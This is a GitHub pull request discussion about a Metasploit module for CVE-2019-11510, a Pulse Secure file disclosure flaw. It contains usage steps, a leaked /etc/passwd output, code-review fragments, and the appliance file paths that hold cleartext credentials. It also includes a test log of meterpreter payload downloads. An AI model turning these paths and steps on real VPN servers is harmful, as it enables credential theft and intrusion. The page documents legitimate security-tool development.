Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[WIP] Module for CVE-2019-11510 - Pulse Secure File Disclosure #12220

Closed
wants to merge 7 commits into from

Conversation

@0xDezzy
Copy link
Contributor

0xDezzy commented Aug 21, 2019

This is a work in progress exploit for CVE-2019-11510

It grabs /etc/passwd and displays it to the terminal

Verification

List the steps needed to make sure this thing works

  1. Start msfconsole
  2. Do use exploit/linux/http/pulse_secure_file_leak
  3. Do set RHOSTS [Pulse secure instance]
  4. Do run

Execution

msf5 auxiliary(linux/http/pulse_secure_file_leak) > run
[*] Running module against ***.***.***.***

[+] Checking...
[+] Target is Vulnerable!
[+] Parsing file.......
[+] root:x:0:0:root:/:/bin/bash.
[+] nfast:x:0:0:nfast:/:/bin/bash.
[+] bin:x:1:1:bin:/:.
[+] nobody:x:99:99:Nobody:/:.
[+] dns:x:98:98:DNS:/:.
[+] term:x:97:97:Telnet/SSH:/:.
[+] web80:x:96:96:Port 80 web:/:.
[+] rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin.
[+] postgres:x:102:102:PostgreSQL User:/:.
[*] Auxiliary module execution completed
0xDezzy added 2 commits Aug 21, 2019
@0xDezzy 0xDezzy changed the title 0x dezzy patch 1 [WIP] Module for CVE-2019-11510 - Pulse Secure File Disclosure Aug 21, 2019
@0xDezzy

This comment has been minimized.

Copy link
Contributor Author

0xDezzy commented Aug 21, 2019

This can be leveraged to gain clear text credentials by grabbing /data/runtime/mtmp/lmdb/dataa/data.mdb?.

I'm working on an updated version that will allow you to grab this binary file, parse it, and show the credentials but this is also my first Metasploit module.

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Aug 21, 2019

Please use two spaces instead of tabs for indentation. It would also be a good idea to run msftidy over your module. msftidy can be found in ./tools/dev/

Additionally, you may want to use store_loot to store the /etc/passwd file.

@0xDezzy

This comment has been minimized.

Copy link
Contributor Author

0xDezzy commented Aug 21, 2019

Thanks! I'll go ahead and do that!

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Aug 21, 2019

Presumably files other than /etc/passwd can be retrieved? I recommend taking a look at some of the existing path traversal modules (ls -R modules | grep traversal) for sample code. Traditionally, file disclosure traversal modules offer options to set both the file path and traversal depth (grep -rn DEPTH modules for examples).

Additionally, exploit modules are expected to return a session. As this module does not return a session, it belongs in the auxiliary/http category, along with other HTTP based traversal modules.

Also, while parsing the passwd file is a nice-to-have feature, it would be much easier to simply store the file as loot (grep -rn store_loot modules for examples). Also, please use store_loot to store the downloaded file, rather than rolling your own file storage functionality (grep -rn store_loot modules for examples).

@@ -0,0 +1,73 @@
# Quick hackish exploit for the CVE-2019-11510

This comment has been minimized.

Copy link
@bcoles

bcoles Aug 21, 2019

Contributor

Presuming that you wish to license this module for use in Metasploit, please use the standard comment header here.

data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)

This comment has been minimized.

Copy link
@bcoles

bcoles Aug 21, 2019

Contributor

Please use store_loot rather than rolling your own file storage functionality.

end
end
end
def parse()

This comment has been minimized.

Copy link
@bcoles

bcoles Aug 21, 2019

Contributor

I'm not really sure what this does, but I'm fairly sure it won't work as intended, especially if the retrieved file is not ASCII.

I presume you're trying to extract the file contents from the HTTP response? Are there any delimiters you can use? This parsing looks brittle.

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Aug 21, 2019

I think the sanity testing failures are unrelated to this PR:

TESTING
DOWNLOADING http://192.168.15.31:5309/windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe
DOWNLOADED http://192.168.15.31:5309/windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe
LAUNCHING C:\payload_test\windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe
FAILED TO RUN C:\payload_test\windows-x64-meterpreter-bind_tcp-192x168x16x182-30001.exe:
[Error 1392] The file or directory is corrupted and unreadable
DOWNLOADING http://192.168.15.31:5309/windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe
DOWNLOADED http://192.168.15.31:5309/windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe
LAUNCHING C:\payload_test\windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe
FAILED TO RUN C:\payload_test\windows-meterpreter-reverse_tcp-192x168x16x182-30002.exe:
[Error 1392] The file or directory is corrupted and unreadable
DOWNLOADING http://192.168.15.31:5309/windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe
DOWNLOADED http://192.168.15.31:5309/windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe
LAUNCHING C:\payload_test\windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe
FAILED TO RUN C:\payload_test\windows-x64-meterpreter_bind_tcp-192x168x16x182-30003.exe:
[Error 1392] The file or directory is corrupted and unreadable
DOWNLOADING http://192.168.15.31:5309/windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe
DOWNLOADED http://192.168.15.31:5309/windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe
LAUNCHING C:\payload_test\windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe
FAILED TO RUN C:\payload_test\windows-meterpreter_reverse_tcp-192x168x16x182-30004.exe:
[Error 1392] The file or directory is corrupted and unreadable
@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Aug 21, 2019

A bit late now, however, for future reference, you can use git mv, to rename/move a file, rather than deleting it.

@0xDezzy

This comment has been minimized.

Copy link
Contributor Author

0xDezzy commented Aug 21, 2019

I was deleting it because I rewrote the entire thing. I will be committing it to the proper directory as well. I will keep that in mind though.

Never really made a PR before so forgive me for the mistakes.

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Aug 21, 2019

@0xDezzy no worries. The only people who have never screwed up git are people who have never used git.
It looks like you deleted your changes?
image

Do you still want this PR open?

@0xDezzy

This comment has been minimized.

Copy link
Contributor Author

0xDezzy commented Aug 21, 2019

Yeah, I'm going to push another commit with an updated version

@@ -0,0 +1,112 @@
##
# This module requires Metasploit: https://Metasploit.com/download

This comment has been minimized.

Copy link
@bcoles

bcoles Aug 23, 2019

Contributor
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
'uri' => uri
})

unless res && res.code ==200

This comment has been minimized.

Copy link
@bcoles

bcoles Aug 23, 2019

Contributor

It might be a good idea to perform some content checking of res.body here, as there are numerous instances where a web server may return 200 OK.

This comment has been minimized.

Copy link
@0xDezzy

0xDezzy Aug 26, 2019

Author Contributor

Looking into it.

This comment has been minimized.

Copy link
@0xDezzy

0xDezzy Aug 26, 2019

Author Contributor

With this exploit, If the file is unable to be accessed or an invalid filepath, it will return a 4xx error. If the content is actually returned, it will return a 200 OK.

I'm looking in how to parse the raw data and grab the specific entries of interest (Cleartext Credentials, Session ID's, hashes, etc) and store those in the loot.

{
'method' => 'GET',
'uri' => uri + payload,
},1395)

This comment has been minimized.

Copy link
@bcoles

bcoles Aug 23, 2019

Contributor

1395 is an awfully long timeout ...

This comment has been minimized.

Copy link
@0xDezzy

0xDezzy Aug 26, 2019

Author Contributor

I'm still trying to figure out how to download this large file in chunks

This comment has been minimized.

Copy link
@wvu-r7

wvu-r7 Oct 2, 2019

Contributor

Oddly specific!

data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)

This comment has been minimized.

Copy link
@bcoles

bcoles Aug 23, 2019

Contributor

Please use store_loot.

This comment has been minimized.

Copy link
@0xDezzy

0xDezzy Aug 26, 2019

Author Contributor

Working on it. Trying to figure out how to implement it.

0xDezzy and others added 3 commits Aug 26, 2019
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
@ahahaah

This comment has been minimized.

Copy link

ahahaah commented Sep 6, 2019

Could you add the function that it can parse the /data/runtime/mtmp/system

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Oct 2, 2019

Hi, @0xDezzy! Are you still working on this module? Let me know if you'd like any help. We have access to a target now.

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

jmartin-r7 commented Oct 4, 2019

@msjenkins-r7 test this please.

@wvu-r7 wvu-r7 self-assigned this Oct 10, 2019
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Oct 30, 2019

Closing this particular PR due to inactivity. I have a rewritten module that I'll PR tonight. It should address outstanding issues and work nicely with the RCE module I wrote. Everyone will be credited for their contributions. Thank you!

@wvu-r7 wvu-r7 closed this Oct 30, 2019
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Oct 30, 2019

Note that the long timeout (1395 seconds) waiting for the server to finish sending data (it never seems to finish) will be obsoleted by an enhancement to Rex::Proto::Http::Client that will allow returning partial responses. I'll PR that separately.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
6 participants
You can’t perform that action at this time.